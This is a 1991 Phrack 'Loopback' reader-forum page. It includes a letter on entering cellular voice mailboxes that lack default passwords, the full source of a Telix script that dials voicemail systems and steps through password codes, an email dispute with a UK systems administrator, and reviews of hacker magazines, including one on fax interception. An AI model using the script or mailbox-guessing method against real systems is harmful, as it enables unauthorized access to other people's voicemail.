[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Phrack Loopback ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ]
Current issue : #35 | Release date : 1991-11-17 | Editor : Dispater
Introduction to Phrack 34Dispater & Crimson Death
Phrack LoopbackPhrack Staff
Phrack Profile of Chris GoggansS. Leonard Spitz
Telenet/Sprintnet's PC Pursuit Outdial DirectoryAmadeus
Sting OperationsSovereign Immunity
Social Security Numbers & PrivacyChris Hibbert
Users Guide to VAX/VMS Part 1 of 3Black Kat
A Beginners Guide to Novell Netware 386The Butler
Auto-Answer ItTwisted Pair
PWN/Part 1Dispater
PWN/Part 2Dispater
PWN/Part 3Dispater
PWN/Part 4Dispater
Title : Phrack Loopback
Author : Phrack Staff
                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 2 of 13

                          [-=:< Phrack Loopback >:=-]

                                By Phrack Staff

     Phrack Loopback is a forum for you, the reader, to ask questions, air
problems, and talk about what ever topic you would like to discuss.  This is
also the place The Phrack Staff will make suggestions to you by reviewing
various items of note; magazines, software, catalogs, hardware, etc.
______________________________________________________________________________

What's on Your Mind
~~~~~~~~~~~~~~~~~~

:: Hacking VMB's ::

From: Mr. Upsetter
To: phracksub@stormking.com
Subject: Phrack 34 VMB article

The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
It reminded me of some experiences I had with a cellular voice mail system a
couple years ago in San Diego.  I would bet there are similar systems in other
cities.

These VMB's would automatically answer calls when the subscriber wasn't on the
air.  They worked just like standard VMB's.  To access the box, the owner could
dial his or her own cellular number, then hit * when it answered.  Then the VMB
would ask for a password.

Guess what the default password was?  None!  That meant all you had to do was
dial up a cellular VMB and hit *, and you were in.  How many VMB's still had
the default password?  About half...

To scan for cellular VMB's all you had to do was dial numbers in the cellular
prefix.  It was pretty fun...almost too easy.

Cheers,
Mr. Upsetter

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

>From: Zoso Puda
>
>After reading PHRACK 34 I thought it was good. Especially the article on VMB
>hacking. As a matter of fact I wrote a SALT script to help me do it.

     This is exactly what we like to see.  People actually getting basic
information and building on it.

-  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -

                    +-------------------------------------+
                    |      ZoSoft Telix VMB Hacker        |
                    |                                     |
                    |       written by: Zoso Puda         |
                    +-------------------------------------+
First words
-----------
   After reading Night Ranger's article (see PHRACK 34), I decided to make a
VMB hacking program. Night Ranger provided good insight into how to hack VMB
systems but some VMBs are hard to crack. What I came up with is a program to
help me hack some of the harder systems. The ones that don't use the defaults
are tough. Also my phone has the buttons and earpiece in one unit and I had to
dial then put the phone to my ear and listen, look at the buttons to dial a
number and put the phone back to my ear to listen. It soon became tiresome.

   What I finally came up with was a program to let me run all the phone
functions from the keyboard. My modem speaker is loud enough to hear clearly so
it seemed like the perfect thing to do. I also automated certain features like
incrementing the password or box number. The program is not fully automated
however. You must run this program manually. It's main purpose is to allow you
to run normal phone functions via the keyboard. If you cannot hear clearly
through your modem speaker then pick up the phone after the program dials the
VMB phone # and hang up the phone before hanging up the modem.

   What follows is a brief description on how to use the program, compile the
program, and run the program. A working knowledge of VMB systems is expected.

Parameter details
-----------------
  VMB phone number : If you don't know this, give it up.

  Setup sequence : This code is used for systems that require a '9' or '#' or
                   '*' to be pressed before the box number. Up to 3 characters
                   can be in this string.

  Valid Box #      : This would be a known valid box or the box you will
                     be attempting to hack. This value remains constant.

  Codefile filename: You may use a file to get 'default' or your favorite
                     passwords from. You must include the extension.

  Starting box/code: Box # or code to start checking. This value will
                     increase automatically upon pressing [F7].

Using the function keys
-----------------------
                [F1]    Dials the VMB system (see params).
                [F2]    Hangs-up the modem.
                [F3]    Closes the current codefile.(see params).
                [F4]    Lets you set the current code/box #.
                [F5]    Dials the Setup sequence (see params).
                [F6]    Dials the current code.
                [F7]    Makes the next code current.
                [F8]    Dials the valid box (see params).
                [F9]    Allows you to re-set the parameters.
                [F10]   Hangs-up and quits the program.
                [0 - 9] These keys will dial 0 - 9 respectively.
                [*, #]  These keys will dial * and #.
                [/]     Used as a substitute # for the keypad.

Basic Insructions
-----------------
Codefiles should be stored in the same directory as your Telix program.

A sample codefile should look like this:

1111
2222
3333
etc...

I suggest you make seperate codefiles for the number of digits in each code.
For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
something similar.

During parameter entry, if you enter a codefile and it exists, you will NOT
be prompted for a 'Starting box/code'. When the codefile is finished, the
current code will set itself to 1000.

If you enter a blank for the codefile or the name you entered doesn't exist
then you will be prompted for a 'Starting Box/Code'.

Compiling
---------
 Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
 VMBHACK.SLT into the directory where your Telix scripts are. Compile using
 CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
 Alt-G followed by the program name (VMBHACK).

//---------------------------<CUT HERE>-------------------------------------
//                   ZoSoft VMB Hacker Version 1.4
//                    Code by: Zoso, November 1991
//
//           See PHRACK 34 for more information on VMB systems.
//
// NOTE: Do not remove the credits of the original author, modified versions
//       you may add credits, but please do not remove any.
//
str code[10],                           // Global Variables
    codes[10],
    reset[1],
    vmb_number[15],
    borc[1],
    valid[10],
    setup[3];
str filename[12],
    fstatus[10];
int f;
int fflag = 0;
init_modem()                            // Modem initialization
{
cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
cputs("^M");                            // some modems, you may have to
waitfor("OK",20);                       // alter this. See you modem
manual.
}
vmb_dial(str string)                    // Dial function
{
str workstr[20];
workstr = string;
strcat(workstr,";");
cputs("ATDT");
cputs(workstr);
cputs("^M");
cputs("^M");
}
hang_up()                               // Hang Up function
{
hangup();
waitfor("",20);
cputs("ATH0");
cputs("^M");
cputs("^M");
clear_scr();
display();
}
next_code()                             // Next code function
{
int cd;
if (fflag)
   {
    if (not feof(f))                    // Check for file first
       {
        fgets(code,10,f);
        return;
       }
    if (feof(f))
       {
        file_close();
        code = "999";
        goto NEXTCODE;
       }
   }
NEXTCODE:
cd = stoi(code);
cd = cd + 1;                            // This line determines how the
code
itos(cd,code);                          // gets incremented.
}
set_code()                              // Enter new code
{
gotoxy(65,2);
gets(code,10);
}
parameters()                            // Set parameters
{
str c[1];
file_close();
GETINFO:
clear_scr();
printsc("VMB Hacker Parameters^M^J");
printsc("^M^JVMB phone number    :");
gets(vmb_number,15);
printsc("^M^JSetup sequence      :");
gets(setup,3);
printsc("^M^JValid box #         :");
gets(valid,10);
printsc("^M^JCodefile filename   :");
gets(filename,12);
if (filename != "")
   {
    open_file();
    next_code();
   }
if (not fflag)
   {
    filename = "N/A";
    printsc("^M^JStarting box/code   :");
    gets(code,10);
   }
printsc("^M^J^M^JCorrect? (Y/n):");
gets(c,1);
if (c == "n" || c == "N")
    goto GETINFO;
}
press_enter()                           // Pause routine
{
str a[1];
pstraxy("Press [ENTER] to continue...",20,23,11);
gets(a,1);
}
title_scr()                             // Title screen
{
str i[1];
TITLE:
clear_scr();
pstraxy("  - ZoSoft VMB Hacker V1.4 -",20,4,11);
pstraxy("written for Telix by: Zoso Puda",20,6,14);
press_enter();
}
display()                               // Display screen
{
box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
pstraxy("VMB Number:",4,2,31);          // Information display
pstraxy(vmb_number,16,2,27);
pstraxy("Valid #:",33,2,31);
pstraxy(valid,42,2,27);
pstraxy("Current:",57,2,31);
pstraxy(code,66,2,27);
pstraxy("Codefile:",6,4,31);
pstraxy(filename,16,4,27);
pstraxy("File status:",29,4,31);
pstraxy(fstatus,42,4,27);
pstraxy("Setup sequence:",50,4,31);
pstraxy(setup,66,4,27);
box(0,6,78,10,4,0,103);                 // Function key display
pstraxy("[           ]",30,6,111);
pstraxy(" 0 - 9,*,#",31,6,110);
pstraxy("[  ] Dial VMB", 2,7,111);
pstraxy("F1", 3,7,110);
pstraxy("[  ] Hang up",22,7,111);
pstraxy("F2",23,7,110);
pstraxy("[  ] Close file",42,7,111);
pstraxy("F3",43,7,110);
pstraxy("[  ] Set Current",61,7,111);
pstraxy("F4",62,7,110);
pstraxy("[  ] Setup seq.",2,8,111);
pstraxy("F5", 3,8,110);
pstraxy("[  ] Dial current",22,8,111);
pstraxy("F6",23,8,110);
pstraxy("[  ] Next box/code",42,8,111);
pstraxy("F7",43,8,110);
pstraxy("[  ] Valid box",61,8,111);
pstraxy("F8",62,8,110);
pstraxy("[  ] Parameters",22,9,111);
pstraxy("F9",23,9,110);
pstraxy("[   ] QUIT",41,9,111);
pstraxy("F10",42,9,110);
gotoxy(0,11);
}
quit_vmb()                              // End program
{
file_close();
hangup();
waitfor("",20);
clear_scr();
printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
cputs_tr(_mdm_init_str);                // Restore modem params
}
open_file()                             // Open Codefile
{
fflag = 1;
f = fopen(filename,"r");
fstatus = "OPEN";
if (ferror(f))
    file_close();
}
file_close()                            // Close Codefile
{
fflag = 0;
fclose(f);
fstatus = "CLOSED";
}
main()                                  // MAIN program module
{
int chr;
title_scr();
parameters();
clear_scr();
display();
init_modem();
TOP:
gotoxy(0,11);
chr = inkeyw();
if (chr == '0')    vmb_dial("0");       // Dial 0-9
if (chr == '1')    vmb_dial("1");
if (chr == '2')    vmb_dial("2");
if (chr == '3')    vmb_dial("3");
if (chr == '4')    vmb_dial("4");
if (chr == '5')    vmb_dial("5");
if (chr == '6')    vmb_dial("6");
if (chr == '7')    vmb_dial("7");
if (chr == '8')    vmb_dial("8");
if (chr == '9')    vmb_dial("9");
if (chr == '#')    vmb_dial("#");       // Pound sign (#)
if (chr == '/')    vmb_dial("#");       // Make (/) same as (#) for keypad
if (chr == '*')    vmb_dial("*");       // Asterisk (*)
if (chr == 15104)                       // F1
    vmb_dial(vmb_number);
if (chr == 15360)                       // F2
    hang_up();
if (chr == 15616)                       // F3
   {
    file_close();
    display();
   }
if (chr == 15872)                       // F4
   {
    set_code();
    display();
   }
if (chr == 16128)                       // F5
    vmb_dial(setup);
if (chr == 16384)                       // F6
    vmb_dial(code);
if (chr == 16640)                       // F7
   {
    next_code();
    display();
   }
if (chr == 16896)                       // F8
    vmb_dial(valid);
if (chr == 17152)                       // F9
   {
    hang_up();
    parameters();
    display();
   }
if (chr == 17408)                       // F10
   {
    quit_vmb();
    goto END;
   }
goto TOP;
END:
prints("^M^J");
}
//---------------------------<CUT HERE>---------------------

______________________________________________________________________________

:: More Legal Stuff ::

>From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
>Subject: RE: Who/What is this?
>
>In this country, the receipt of documents like this would probably be
>pretty helpful in sending a person down on a conspiracy to contravene
>a section or more of the Computer Misuse Act, I do not appreciate crap
>like this appearing on my machine but since you didn't send it me, I
>can't really moan at you - What I would appreciate though is if you
>told people that forwarding it to people who don't want it is probably
>not a good idea, unless you want all your list members locked up in
>some pokey British gaol that is!
>
>Michael Lawrie.
>---
>Michael Lawrie, Hicom Group Security           <security@uk.ac.lut.hicom>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sir,
     You will have to excuse my ignorance of telecom laws in other countries.
In the United States, distribution of technical information such as Phrack Inc.
is protected by law.

     Hackers are not involved in conspiracies or plots.  Most hackers could
care less about politics.  Hackers are interested in the progression of
technology and learning about how our advanced society works.  The inefficient
structure known as government is the last thing most hackers are interested in
exploring.

     Phrack Inc. has no "membership."  Phrack Inc. is an electronically
distributed publication.  It is like any other security oriented newsletter.
Have you ever heard of "Computer Security Journal", "Computers and Security",
or "Computer Crime Digest?"  These are some of the "security industry"
publications that are read in the U.S.  Phrack Inc. merely has a little
different flavor to it.  If you are interested in seeing any of these printed
journals, I can forward their address to you.

     I am sorry if you received Phrack Inc. and didn't wish to read it.  You
might wish to take the matter up with the person that forwarded it to you.  I
hope it wasn't too big of an inconvenience for you to delete the mail message
containing Phrack Inc.

Cheers,

Dispater

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     After a (as it turns out not so private) conversation with Torq, it seems
this guy isn't even an admin anywhere.  He just likes to pretend he is.  Did my
reply end this little debate?  NOT!  This person had the nerve to intercept my
private mail to Torq and then proceeded to bitch about it some more.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

>From MICHAEL@hicom.loughborough.ac.uk Sat Nov  9 09:45:53 1991
Date: Fri, 8 Nov 91 13:19 GMT
From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>>
Subject: The EFF.

I found the following message the other day, whilst routing around, I am to
assume you lied to me about taking him off the list but for now we'll forget
that.

> From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991
> Date: Wed, 23 Oct 91 01:41:47 -0400
> From: phracksub@stormking.com
> Message-Id: <::::::::::::::::::::::>       
> To: torq@:::::::::::::::
> Subject: Phrack
>
> This guy sounds like a total idiot. If he does kill your account or something
> stupid, get a hold of the EFF.  They went to bat for someone who had their
> account revoked because he/she had issues of Phrack on their directory.
>
> people should get a clue....
>
> Dispater
> phracksub@stormking.com

As you say, people should get a clue. Are you assuming that 'torq' is perhaps
American and as such has his rights protected by constitution? He isn't, he is
British and doesn't really as such have much going for him. If I want to kill
his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
is not breaking any laws because it does not show intent, it would be breaking
my machine's regulations if it came here. I would enjoy the EFF to come 'to
bat' for Torq if I revoke his account for having issues of Phrack in his
directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
that you know of?

Regards...
  Michael.

---
Michael Lawrie, Operations Group, Systems Development and Security.
Mail: michael@uk.ac.lut.hicom                     (Span:19527::60478::lorry)
[What pretentious signature?]                     (Inet: lorry@mit.edu)


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From: Dispater
To: MICHAEL@hicom.loughborough.ac.uk

        I never said I would delete him from the distribution list.  I don't
have to DO anything.  Who the hell are you pretending to be anyway?  You aren't
the admin of MIT's gnu machine.

>I found the following message the other day, whilst routing around, I am to
>assume you lied to me about taking him off the list but for now we'll forget
>that.

        Really?  What the hell were you doing prowling though someone else's
mail?  I assume you did it without Torq's permission.  I wonder if MIT would
like to hear that some British hacker is rummaging around their machine?  Your
"finding" of our private e-mail might place you in criminal violation of the
Electronic Communications Privacy Act of 1986.  This is a federal law in the
United States which protects the privacy of electronic communications.  Your
interception of our communications has violated our privacy.  How would you
like me to have a little chat with YOUR supervisor?

       Why you care about what takes place on the MIT computer which is located
here in the USA?  In this country freedom of speech is a right granted to all
its citizens.  The previous publisher of Phrack had to go to Federal Court to
prove it and he succeeded.  Phrack Inc. is 100% legal here and there is not one
damn thing you can do about it!

Dispater
______________________________________________________________________________

:: Hacker Philosophy ::

From: The Dark Lord Sarik Malthus
Organization: Underground Computing Foundation


>         I'm curious...now, don't think I am trying to judge you, or your
> actions, or anything...but I am wondering how you, in your mind, justify the
> actions of hackers and the kind of information provided by your magazine?

     I don't.  I think people spend too much time attempting to justify
their "morality."  I don't play that guilt trip.  I only seek information.
Information has no morality.  It is simple and pure, just like truth.

     I do feel that with knowledge comes responsibility not to use it in a
destructive way.  This is why I will not print "how to make bomb" files in
Phrack Inc.  Explosives are made for one thing and it doesn't involve too
much creativity.  People can get that type of stuff elsewhere.

     I have never damaged any system or hurt any individual financially.
Carding is unquestionable robbery.  If you know the person you are carding
from, that is revenge and is a different category, as far as I am concerned,
but it still doesn't make it right.  Besides, any poser with half a brain can
pull a CBI.  That doesn't demonstrate much talent to me.  I admit I went
through the c0deZ phase, but I moved onto better things.

     I guess your basic question may boil down to, "Why hack?"  I see the
internet and the telecom world in as the latest frontier to be explored.  If
you look back at how this country started, you will see that it was explored
by people who probably had a similar mentality to that of hackers.  We want
to test ourselves.  We want to have a broad range of different experiences in
our lives.  We are not content with ignorance of the unknown.  And, to some
extent we are sick of our current society's norms.  With that in mind we
leave the security of what is considered acceptable at times.

     I guess I have a lot of different unpopular views....oh well.
_______________________________________________________________________________

A Review of:
~~~~~~~~~~
Full Disclosure #23 - a publication For Truth, Justice, and The American Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Full Disclosure                              Subscription Rates:
P.O. Box 903-FD23                            U.S - 12 issues for $18.00
Libertyville  IL  60048                            24 issues for $29.95
                                             No Canadian orders, please!
by:Twisted Pair


     About a month ago I mailed in a coupon I got from friend in order to get a
sample issue of Full Disclosure.  Within a week I received Issue #23.  It's got
articles on fax interception, dumpster diving, computer security tips,
surveillance tips, technical stuff, mail surveillance, etc.

     The Fax Interception article was most interesting to me.  I've often
wondered just how easy it could be to intercept faxes.  Its all explained in
the article.  Here's some text from the article:

|                       False Sense of Security:
|
|   With the widespread proliferation of fax machines came increased use.
|   In general, a document transferred has been given the same sort of
|   validity as one sent or received by the U.S. Mail.*  In general, such
|   communications were originally secure.  Now that interception equipment is
|   available, the
|   sense of security has become false.

*Note:  Just this month, the FCC has stopped accepting paperwork with faxed
        signatures on them.  Their new policy states that they only accept
        original signatures.

     How could the average Phrack reader start intercepting faxes?  Use a
standard fax machine hooked up to someone's line?  Naaah.  Wouldn't work.  The
handshaking routine between the two corresponding fax machines would be screwed
all to hell if you threw a third machine into the mix.  Full Disclosure claims
to have successfully nabbed faxes with another method.  They've pointed out
this assertion with a photo on their front page of a "fax".  It was supposedly
intercepted from the FBI.  It shows a computer screen with an FBI "FAX" on it.
It looks more like the photo was made with some cutting and pasting at the
neighborhood PIP store.  Maybe they should have added the caption "Simulated
Picture" to their front page.

     They recommend using IBM PC fax boards to intercept faxes.  You'd need
"sophisticated" software that would ignore the handshaking sequences between
the two fax machines you're spying on.  The IBM would just save all the page
information and ignore the protocol information transmitted.

Back to the article....

|   Cellular phone-based fax machines provide ripe opportunity for "hacker"
|   intercepts, since the signal is available via low cost police scanners.*
|   No physical connection to a common carrier network is necessary.  There is
|   absolutely no risk of being detected.

*Note:  That should read MODIFIED police scanners.  See any of the ads in
        "Nuts & Volts" for a book on doing this.

     Discussed in the article is something called Broadband Interception.
Commercial fax interception equipment can be hooked up to monitor satellite
link traffic.  One unit can decode up to 150 simultaneous fax transmissions
from a 6,000 phone line satellite link.

     Next, all the consequences of forged faxes are discussed.  People have
become so reliant on fax technology that they incorrectly assume that anything
that "comes over the fax" must be legitimate.  Forgers find faxing much simpler
than trying to make a "real" document.  The trouble of altering postmarks and
signatures is bypassed.  All they need now is scissors and tape to make any
"legitimate-looking" document needed.  In their next issue, they further
discuss fax interception and all the implications of sending sensitive info by
fax.

|                         Fax Intercept Suppliers
|          (The sale and/or use of fax interception equipment may be
|                  restricted by State and Federal law)
|
|   Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
|   Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
|   El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
|   [Many others listed]

Oh, here's an ad from Full Disclosure.  It's a business card run:
     ______________________________________________________
|   |                                                      |
|   | Unix Systems Specialists     Available July 10, 1992 |
|   |                                                      |
|   |               L  E  N       R  O  S  E               |
|   |                                                      |
|   |                  Convicted "Hacker"                  |
|   |                         and                          |
|   |                 Computer  Consultant                 |
|   |              799 Royal St. Geore  #105               |
|   |         Naperville, IL 60563  (708) 527-1293         |
|   |______________________________________________________|

     Since you might want to check out a copy of Full Disclosure for yourself,
I'll include their address and stuff.  The issue I had was 16 pages long,
half-newspaper size.
______________________________________________________________________________


A Review of TAP #105
~~~~~~~~~~~~~~~~~~~
TAP Magazine                                       Subscription Rates:
PO Box 20264                                       10 issues for $10.00
Louisville KY  40250-0264

by Dispater

     Around March of 1991 I mailed in my $10. for a subscription to TAP
Magazine.  Promoted as "the oldest hacker magazine" and "created by Abbie
Hoffman."  I still, to this day, have not received ONE issue for my money.

     While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
back issues consisting of #97, #100 through issue #104.  I was later given a
complimentary issue of #105.  After asking about #98 & #99, Predat0r said that
he wasn't going to give those out because of some bullshit with Aristotle.
Whatever...I still don't see why we couldn't see it.

     Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
but it wasn't bad either.  The issue was 18 pages long.  For those of you who
have never seen it, TAP contains information on hacking and phreaking as well
as some political commentary.  The articles are always diverse and interesting.

     TAP #105 contained information about the DNA Box.  This is basically
cellular phone phreaking.  It was very good and quite detailed.  There were
also schematics of bugs and a flow chart explaining the incident initiation
sequence of the E-911 system.  This issue of TAP was sprinkled with some neat
advertisements and news clippings (as usual) and wrapped up with a file about
Blue Boxing.  The price of $10.00 for 10 issues is worth it, but read on...

     Last week I asked Predat0r what was going on with TAP magazine.  He told
me that he had the material for the next three issues, but his copier or some
other equipment was broken.  This is an excuse I have heard before.  Whether it
is a valid excuse or not, only he knows.  Since issue #105 (June) there has
been not one issue of TAP.  If you have ordered a subscription prior to July
and not received anything, I highly suggest you write to Predat0r.

     The material contained in TAP is good and very much worth the price.
(Especially compared to 2600 Magazine) However, I find that the general
management of TAP to be poor, at this time, and therefore I highly recommend
that you NOT send your $10 to TAP Magazine.  Considering the amount of
advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
2600, etc.) in the past year, there is no excuse for the non-existent service
that has transpired.  Predat0r is a good sysop and needs to manage TAP as he
does his BBS.  I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
COLUMBIAN COKE.

     I really don't like to be so critical, but I know some people I've talked
to are feeling ripped off.  This is why I wrote this.  I truly hope that TAP
can get out of this slump.
_______________________________________________________________________________
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2014, Phrack Magazine.